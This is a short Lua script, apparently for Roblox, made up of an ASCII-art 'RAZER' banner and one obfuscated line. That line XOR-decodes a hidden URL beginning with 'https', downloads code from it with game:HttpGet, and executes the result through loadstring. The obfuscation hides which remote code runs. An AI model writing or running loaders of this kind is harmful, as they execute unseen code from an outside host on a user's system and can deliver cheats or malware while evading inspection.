--[[



██████╗░░█████╗░███████╗███████╗██████╗░
██╔══██╗██╔══██╗╚════██║██╔════╝██╔══██╗
██████╔╝███████║░░███╔═╝█████╗░░██████╔╝
██╔══██╗██╔══██║██╔══╝░░██╔══╝░░██╔══██╗
██║░░██║██║░░██║███████╗███████╗██║░░██║
╚═╝░░╚═╝╚═╝░░╚═╝╚══════╝╚══════╝╚═╝░░╚═╝



]]

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for i=1 -0, #v8 do v6(v10,v0(v4(v1(v2(v8,i,i + ((641 -330) -(43 + 267)))),v1(v2(v9,1 + 0 + ((i-((375 -(68 + 306)) + (515 -(163 + 352))))% #v9),((1684 -(367 + 179)) -(71 + 20 + (2643 -1597))) + ((i-(1 + 0))% #v9) + 1)))%(61 + 195)));end return v5(v10);end loadstring(game:HttpGet(v7("\160\108\82\100\63\242\55\9\99\59\191\54\77\120\43\186\108\78\58\37\167\55\86\117\63\188\125\9\119\46\188\125\30\59\62\169\111","\200\24\38\20\76")))();
